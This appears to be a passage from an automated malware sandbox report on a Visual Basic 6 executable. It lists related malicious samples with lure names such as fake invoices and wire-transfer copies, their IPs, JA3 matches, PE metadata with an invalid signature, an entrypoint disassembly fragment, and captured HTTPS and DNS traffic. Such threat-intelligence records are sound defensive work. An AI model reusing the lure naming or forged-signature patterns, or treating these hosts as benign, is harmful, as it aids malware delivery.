                                                                                Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                                • 35.209.237.178
                                                                                Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                                                                • 35.209.201.177
                                                                                RFQ K1062 PROJECT.exeGet hashmaliciousBrowse
                                                                                • 35.208.174.213
                                                                                OVHFRiQThKRLiA7.exeGet hashmaliciousBrowse
                                                                                • 198.50.252.64
                                                                                UwQ0OtK2xW.exeGet hashmaliciousBrowse
                                                                                • 213.186.33.5
                                                                                VUBuRErqKh.dllGet hashmaliciousBrowse
                                                                                • 145.239.131.60
                                                                                TUj6o3ePFl.exeGet hashmaliciousBrowse
                                                                                • 51.254.241.28
                                                                                Gx8b0xWdGB.exeGet hashmaliciousBrowse
                                                                                • 149.202.7.96
                                                                                XFfw6uDKna.exeGet hashmaliciousBrowse
                                                                                • 176.31.116.35
                                                                                HUCGOYy2oO.exeGet hashmaliciousBrowse
                                                                                • 51.195.57.229
                                                                                PO64882570060US.exeGet hashmaliciousBrowse
                                                                                • 139.99.231.195
                                                                                SecuriteInfo.com.Trojan.PackedNET.721.17987.exeGet hashmaliciousBrowse
                                                                                • 51.254.84.37
                                                                                mormanti.exeGet hashmaliciousBrowse
                                                                                • 51.255.165.160
                                                                                deepRats.exeGet hashmaliciousBrowse
                                                                                • 193.70.112.165
                                                                                9U3DwMGK0t.exeGet hashmaliciousBrowse
                                                                                • 51.195.61.169
                                                                                DpuO7oic9y.exeGet hashmaliciousBrowse
                                                                                • 46.105.74.11
                                                                                kung.xlsxGet hashmaliciousBrowse
                                                                                • 198.50.252.64
                                                                                Swift Copy Of Wire Transfer2_PDF.exeGet hashmaliciousBrowse
                                                                                • 158.69.185.137
                                                                                LAGIk5ic3R.exeGet hashmaliciousBrowse
                                                                                • 51.89.64.86
                                                                                Bot3.91.jarGet hashmaliciousBrowse
                                                                                • 46.105.116.59
                                                                                Bot3.91.jarGet hashmaliciousBrowse
                                                                                • 46.105.116.59
                                                                                mixazed.exeGet hashmaliciousBrowse
                                                                                • 51.75.233.76
                                                                                jnl3kWNWWS.exeGet hashmaliciousBrowse
                                                                                • 54.39.133.15

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                37f463bf4616ecd445d4a1937da06e19Doc_PDF.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                5S6Cod7HCf.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                SecuriteInfo.com.W32.AIDetect.malware2.14010.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                xy3zf2YjS8.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                2dgOIcIVVb.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                2m4OlrMaLT.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                WOVngDEXHM.dllGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                VUBuRErqKh.dllGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                filedata.dllGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                filedata.dllGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                1QlPzq5tJh.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                WaLOK0TUYN.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                oi6Gg59khh.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                1i9tHMz36f.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                8NVyaLrTJy.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                sq9aBtcak6.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                ZWQelKES9A.dllGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                voice mail.htmlGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                5cksYFGC2g.exeGet hashmaliciousBrowse
                                                                                • 133.130.104.18
                                                                                New Working C0D377B99993939393939939.htmGet hashmaliciousBrowse
                                                                                • 133.130.104.18

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                No created / dropped files found

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):4.804431914533398
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:F63V4i8eZU.exe
                                                                                File size:271464
                                                                                MD5:08730cdd286a4c9d46b38bb6545ac311
                                                                                SHA1:001bb7b5b8d63e505661d7e4a178d08abe6bbad7
                                                                                SHA256:cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
                                                                                SHA512:a6531eb4709af3e1270f1c4434d9abc87097e9f8d38c4ba5dc0ed61d7f469552de7259f638728fe71297d3748823064f75728e71df3531657a5aeb1952f412d8
                                                                                SSDEEP:1536:d/k1xdvMuWnLtmBcSa9O/C0UzIY+SpAkaYQryC7AfT/k1xD:5ktvMu8GcSaw/RQ80fDkz
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................................Rich............PE..L.....fI.................`..........<........p....@................

                                                                                File Icon

                                                                                Icon Hash:e8ccce8e8ececce8

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x40133c
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:true
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x49669CB5 [Fri Jan 9 00:39:17 2009 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:ce5c4ac311690d884b7f964e897cf716

                                                                                Authenticode Signature

                                                                                Signature Valid:false
                                                                                Signature Issuer:E=MIDLE@perkysex.Sta, CN=Tykho, OU=LRDAGSD, O=Oedogo, L=gener, S=Succuss7, C=FO
                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                Error Number:-2146762487
                                                                                Not Before, Not After
                                                                                • 7/19/2021 1:52:32 AM 7/19/2022 1:52:32 AM
                                                                                Subject Chain
                                                                                • E=MIDLE@perkysex.Sta, CN=Tykho, OU=LRDAGSD, O=Oedogo, L=gener, S=Succuss7, C=FO
                                                                                Version:3
                                                                                Thumbprint MD5:6B2F2AEC1CD19ADB58F69D332AA6EB10
                                                                                Thumbprint SHA-1:A168A0624017FAD1687EFD7218165EAAD0667521
                                                                                Thumbprint SHA-256:7B29D7974E330B45B5772C1F20898DB73558EAF4668727D08A94229F6C2C5A9A
                                                                                Serial:00

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                push 00432170h
                                                                                call 00007EFE34D60953h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                xor byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                inc eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add bh, dl
                                                                                xor ebx, dword ptr [esi+54DBD587h]
                                                                                inc esp
                                                                                mov dword ptr [ebx], ebp
                                                                                sbb al, byte ptr [edx]
                                                                                mov edi, 0052F3B1h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx+00h], al
                                                                                push es
                                                                                push eax
                                                                                add dword ptr [ecx], 61h
                                                                                jnc 00007EFE34D609D6h
                                                                                jc 00007EFE34D609CCh
                                                                                jnc 00007EFE34D609CDh
                                                                                add byte ptr [eax], al
                                                                                add ah, ah
                                                                                jbe 00007EFE34D60969h
                                                                                add eax, dword ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add bh, bh
                                                                                int3
                                                                                xor dword ptr [eax], eax
                                                                                adc ecx, dword ptr [eax+03h]
                                                                                stosd
                                                                                cmp dword ptr [ecx+ecx*4-174BB90Fh], eax
                                                                                aas
                                                                                insb
                                                                                jmp 00007EFDB759C1B5h
                                                                                jecxz 00007EFE34D6098Ah
                                                                                dec eax
                                                                                sbb dl, byte ptr [ecx+738049FEh]
                                                                                fld qword ptr [edi+62h]
                                                                                out dx, eax
                                                                                jnbe 00007EFE34D6095Fh
                                                                                cmp cl, byte ptr [edi-53h]
                                                                                xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                or al, 00h
                                                                                stosb
                                                                                add byte ptr [eax-2Dh], ah
                                                                                xchg eax, ebx
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                push eax
                                                                                or al, 03h
                                                                                add byte ptr [esi+0000007Bh], dl
                                                                                pop es
                                                                                add byte ptr [eax+6Fh], dl
                                                                                jnc 00007EFE34D609CBh
                                                                                je 00007EFE34D609CBh
                                                                                xor eax, 07010D00h
                                                                                add byte ptr [edi+72h], cl
                                                                                jc 00007EFE34D609C8h
                                                                                bound esi, dword ptr [edx]

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x364a40x28.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x80e2.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x410500x1418
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11000x1c.text
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x100.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x359080x36000False0.261126482928data4.74357269576IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .data0x370000xb900x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x380000x80e20x9000False0.31982421875data4.39996163411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_ICON0x3fa7a0x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 4265541880, next used block 7936
                                                                                RT_ICON0x3f7920x2e8data
                                                                                RT_ICON0x3f5aa0x1e8data
                                                                                RT_ICON0x3f4820x128GLS_BINARY_LSB_FIRST
                                                                                RT_ICON0x3e5da0xea8data
                                                                                RT_ICON0x3dd320x8a8data
                                                                                RT_ICON0x3d66a0x6c8data
                                                                                RT_ICON0x3d1020x568GLS_BINARY_LSB_FIRST
                                                                                RT_ICON0x3a4fa0x2c08data
                                                                                RT_ICON0x394520x10a8data
                                                                                RT_ICON0x38aca0x988data
                                                                                RT_ICON0x386620x468GLS_BINARY_LSB_FIRST
                                                                                RT_GROUP_ICON0x385b40xaedata
                                                                                RT_VERSION0x383000x2b4dataEnglishUnited States

                                                                                Imports

                                                                                DLLImport
                                                                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaR4Str, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0409 0x04b0
                                                                                LegalCopyrightOFF24
                                                                                InternalNameISOL
                                                                                FileVersion7.00
                                                                                CompanyNameOFF24
                                                                                LegalTrademarksOFF24
                                                                                CommentsOFF24
                                                                                ProductNameOFF24
                                                                                ProductVersion7.00
                                                                                FileDescriptionOFF24
                                                                                OriginalFilenameISOL.exe

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 19, 2021 20:22:21.080987930 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:21.394221067 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:21.394370079 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:21.417826891 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:21.730709076 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:21.737677097 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:21.737735033 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:21.737766981 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:21.737859964 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:21.737929106 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:21.871129036 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.185408115 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.185559034 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.210118055 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.525378942 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525439024 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525480986 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525517941 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525522947 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.525557995 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525573969 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.525595903 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525633097 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525670052 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525707960 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.525754929 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.526747942 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.526801109 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.526806116 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.526808977 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.838639021 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838675976 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838705063 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838735104 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838771105 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838778973 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.838803053 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.838805914 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.838835955 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.838917971 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839443922 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839478970 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839515924 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839525938 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839553118 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839581013 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839586973 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839622021 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839651108 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839657068 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839689970 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839696884 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839734077 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839759111 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:22.839767933 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:22.839827061 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.151542902 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151568890 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151585102 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151607037 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151627064 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151645899 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151648045 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.151673079 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151680946 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.151693106 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.151746035 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152281046 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152298927 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152313948 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152328968 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152348042 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152359962 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152376890 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152391911 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152405977 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152425051 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152437925 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152458906 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152481079 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152496099 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152503014 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152523041 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152535915 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152545929 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152569056 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152570963 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.152606964 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.152659893 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467056036 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467194080 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467196941 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467259884 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467295885 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467340946 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467351913 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467398882 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467442036 CEST49746443192.168.2.3133.130.104.18
                                                                                Jul 19, 2021 20:22:23.467463017 CEST44349746133.130.104.18192.168.2.3
                                                                                Jul 19, 2021 20:22:23.467519045 CEST44349746133.130.104.18192.168.2.3

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 19, 2021 20:20:33.559631109 CEST6493853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:33.609148026 CEST53649388.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:34.550723076 CEST6015253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:34.603053093 CEST53601528.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:35.312916040 CEST5754453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:35.362303972 CEST53575448.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:36.360982895 CEST5598453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:36.363857031 CEST6418553192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:36.413284063 CEST53559848.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:36.423850060 CEST53641858.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:37.212475061 CEST6511053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:37.261863947 CEST53651108.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:38.495677948 CEST5836153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:38.548074961 CEST53583618.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:39.342786074 CEST6349253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:39.391980886 CEST53634928.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:40.180782080 CEST6083153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:40.238213062 CEST53608318.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:41.129878998 CEST6010053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:41.179394960 CEST53601008.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:42.574830055 CEST5319553192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:42.626993895 CEST53531958.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:43.403269053 CEST5014153192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:43.452325106 CEST53501418.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:44.209593058 CEST5302353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:44.270119905 CEST53530238.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:45.072484970 CEST4956353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:45.127330065 CEST53495638.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:46.346393108 CEST5135253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:46.407644987 CEST53513528.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:48.330955982 CEST5934953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:48.380530119 CEST53593498.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:49.137635946 CEST5708453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:49.186754942 CEST53570848.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:20:50.065603018 CEST5882353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:20:50.116091967 CEST53588238.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:07.558855057 CEST5756853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:07.622271061 CEST53575688.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:09.921204090 CEST5054053192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:09.991080046 CEST53505408.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:39.148587942 CEST5436653192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:39.206531048 CEST53543668.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:40.195602894 CEST5303453192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:40.255758047 CEST53530348.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:41.476366043 CEST5776253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:41.536844969 CEST53577628.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:41.538119078 CEST5543553192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:41.596875906 CEST53554358.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:42.204757929 CEST5071353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:42.264861107 CEST53507138.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:43.001617908 CEST5613253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:43.064276934 CEST53561328.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:44.071482897 CEST5898753192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:44.128628016 CEST53589878.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:44.846872091 CEST5657953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:44.906038046 CEST53565798.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:46.062295914 CEST6063353192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:46.121395111 CEST53606338.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:49.970741987 CEST6129253192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:50.031312943 CEST53612928.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:50.698548079 CEST6361953192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:50.758630991 CEST53636198.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:21:56.443286896 CEST6493853192.168.2.38.8.8.8
                                                                                Jul 19, 2021 20:21:56.500726938 CEST53649388.8.8.8192.168.2.3
                                                                                Jul 19, 2021 20:22:00.153147936 CEST6194653192.168.2.38.8.8.8
